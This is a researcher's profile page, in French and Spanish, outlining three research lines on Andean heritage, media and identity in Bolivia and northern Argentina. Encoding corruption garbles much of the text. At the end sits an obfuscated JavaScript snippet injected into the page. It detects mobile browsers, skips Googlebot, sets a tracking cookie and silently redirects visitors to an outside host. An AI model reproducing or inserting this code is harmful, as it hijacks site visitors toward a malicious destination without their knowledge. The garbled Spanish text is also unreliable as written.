Pablo CRUZ

Pablo CRUZ,A�Chercheur (CONICET, Argentine) et associA� au centre EREA.

En el marco del proyecto FABRIQa��AM me propongo llevar adelante tres ejes de trabajo, los cuales se muestran en continuidad con los estudios que vengo desarrollando, en torno al patrimonio y los procesos de patrimonializaciA?n,A�en regiones andinas de Bolivia y norte de Argentina.

PATRIMONIOS Y NARRATIVAS SOBRE EL PASADO

Para los campesinos indA�genas de gran parte de los Andes, los restos que denominamos A�A�arqueolA?gicosA�A� son considerados como los testimonios dejados por una humanidad diferente y prA?cticamente extinta, identificada segA?n las regiones bajo los nombres genA�ricos de chullpas, gentiles o bien, antiguos. Estos testimonios materiales (ruinas de viviendas, tumbas, arte rupestre, etc.) se constituyen la mayor parte de las veces como verdaderos hitos geogrA?ficos cargados de significaciA?n, interviniendo activamente en las explicaciones ontolA?gicas sobre el mundo. Sin embargo, ellos son al mismo tiempo espacios de encuentro con el inframundo, con la energA�a que desde allA� se emanada, y con las entidades que lo pueblan: entre otros los diablos, los muertos y los mismos espA�ritus de los antiguos Chullpa. Partiendo de las informaciones recogidas principalmente en los departamentos de PotosA� y Chuquisaca en Bolivia, continuaremos reflexionando sobre la percepciA?n de los sitios arqueolA?gicos y al diA?logo con el pasado, analizando tanto la profundidad histA?rica de las categorA�as, entidades y principios -y sus relaciones-, presentes hoy en estos espacios significantes, como su participaciA?n dentro de los intensos procesos de cambio social que tuvieron lugar durante los A?ltimas dA�cadas.

TECNOLOGA?AS, MEDIOS DE COMUNICACIA�N Y NUEVOS SOPORTES ONTOLA�GICOS

Una de las caracterA�sticas mA?s resaltantes del pensamiento de los campesinos aymaras y quechuas de los Andes bolivianos se encuentra en la capacidad de poder articular simultA?neamente, y sin contradicciA?n, diferentes realidades. Mucho de esto se debe a la marcada fluidez de los principios, entidades y demA?s categorA�as que conforman sus realidades y las explican. Este marco de flexibilidad, permeabilidad y fluidez de pensamiento permite el ejercicio de una constante e intensa dinA?mica de reformulaciA?n del mundo, que supera aquellos conceptos de adaptaciA?n, resiliencia o resistencia frente al cambio cultural. Dentro de lo que se da a entender como proceso de mundializaciA?n o globalizaciA?n, en la A?ltima dA�cada se desarrollaron en Bolivia nuevos soportes tecnolA?gicos que permitieron un mayor alcance y generalizaciA?n de los medios de comunicaciA?n (TV por cable y satelital, DVD’S, CD’S, MP3’s y MP4’s, telefonA�a, internet) llegando su mercado a las poblaciones campesinas, sea ya en las propias comunidades o en los mercados de ciudades y pueblos. En los A?ltimos aA�os, y de manera progresiva, estas tecnologA�as y medios no solo amplA�an exponencialmente las informaciones sobre el mundoA� fuera de las comunidades y de paA�s, y sus mA?ltiples realidades e imaginarios, sino que comenzaron a ser utilizadas en tanto que soportes narrativos para la generaciA?n, reformulaciA?n y difusiA?n de explicaciones y discursos sobre aquello que constituye lo propio. Por ejemplo, en los mercados campesinos urbanos y peri-urbanos, espacios donde estA?s dinA?micas se muestran muy evidentes, podemos encontrar hoy un prolA�fico repertorio deA� CD’s de mA?sica tradicional y cumbia chicha boliviana, y en menor medida, DVD’s con producciones audiovisuales A�A�caserasA�A� sobre las grandes fiestas, tradiciones populares (p.e. el matrimonio en las comunidades) y legendarios personajes del mundo otro (p.e. Likichiris, condenados, Supay, etc.). A�En esta lA�nea de investigaciA?n nos proponemos estudiar el funcionamiento de estas dinA?micas y comprender su rol y gravitaciA?n en la creaciA?n y reproducciA?n de la memoria social y de las explicaciones ontolA?gicas sobre el mundo. El tema serA? abordado a travA�s de tres ejes : la producciA?n, la difusiA?n y la reproducciA?n de estos soportes narrativos.

MEMORIAS, NOSTALGIAS Y NUEVAS NARRATIVAS ANDINAS EN EL NORTE DE ARGENTINA

En el imaginario nacional de la Argentina, la representaciA?n del A�A�mundo andinoA�A� fue histA?ricamente ubicada en el extremo noroeste del paA�s, en los valles y altiplanos de las provincias de Salta y Jujuy. En contraste con los grandes centros econA?micos, el relieve montaA�oso de la regiA?n y los modos de vida y costumbres tradicionales de sus pobladores fueron -y continA?an siendo-, considerados como uno de los ejemplos mA?s notorios de la diversidad geogrA?fica y cultural de la NaciA?n. Contribuye en ello tambiA�n el fuerte componente indA�gena y campesino de los pobladores y su proximidad con otros paA�ses y regiones, focos de andinidad, como Bolivia y el norte de Chile. Sin embargo, lejos de su cristalizaciA?nA�folclA?ricaA�dentro del imaginario nacional, la regiA?nA�fue desde siempre un escenario de intensos procesos de cambio social y dinA?micas culturales. En este sentido, tanto la migraciA?n econA?mica como el fenA?meno de la globalizaciA?n, y dentro de ella la escalada planetaria de la ideologA�a de libre mercado y la generalizaciA?n de los medios de comunicaciA?n y soportes audiovisuales, fueron causales de que estos procesos y dinA?micas sociales y culturales se intensificaron durante las A?ltimas dA�cadas. De hecho, hoy en dA�a la principal poblaciA?n oriunda de esta parte de los Andes se encuentra establecida en las periferias de las grandes ciudades como Buenos Aires y Mendoza, o bien en enclaves econA?micos como en la Patagonia. Al mismo tiempo, y acompaA�ando un proceso de valorizaciA?n y empoderamiento polA�tico y territorial de los pueblos indA�genas andinos, en los A?ltimos aA�os se intensificaron y se fortalecieron las dinA?micas identitarias en la regiA?n, asA� como aquellas de intercambio y transferencia con las regiones vecinas. AsA�, la parte A�A�andinaA�A� del paA�s viene progresivamente reforzando su lado mA?s A�A�andinoA�A�, pero ya no desde loA�folclA?ricoA�y lo tradicional, o desde el exotismoA�interno, sino mas bien integrando plenamente un movimiento mA?s amplio y profundo que traspasa las fronteras nacionales.

En este marco, desde hace ya algunos aA�os vienen surgiendo y desarrollA?ndose en esta regiA?n del NOA nuevas formas de expresiA?n y soportes para la construcciA?n de memoria colectiva que guardan en comA?n tanto la imperante necesidad en valorar lo propio, lo local, lo indA�gena y lo andino. Como ante toda situaciA?n de cambio, de esta intensa dinA?mica cultural emergieron algunas tensiones y cuestionamientos sobre lo A�A�verdaderamenteA�A�A�propio y tradicional, llegando incluso a ser objeto de intensos debate acerca de los lA�mites delA�folcloreA�regional y nacional. Tal fue el caso,A�por ejemplo, con recientes fusiones musicales como las copla-rap surgidas en Abrapampa y el tinku-hipop de PalpalA?. El objetivo que nos proponemos es reflexionar sobre la gravitaciA?n social de estas nuevas formas y soportes de expresiA?n y expresividad, y en particular el lugar que ocupan en ellos la producciA?n de memoria y nostalgia dentro de los actuales procesos de cambio social y reformulaciA?n identitaria, asA� como las tensiones surgidas entre los fenA?menos de la tradiciA?n, la relaciA?n con el pasado, y los instrumentos, acciones y perspectivas del presente cultural.

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}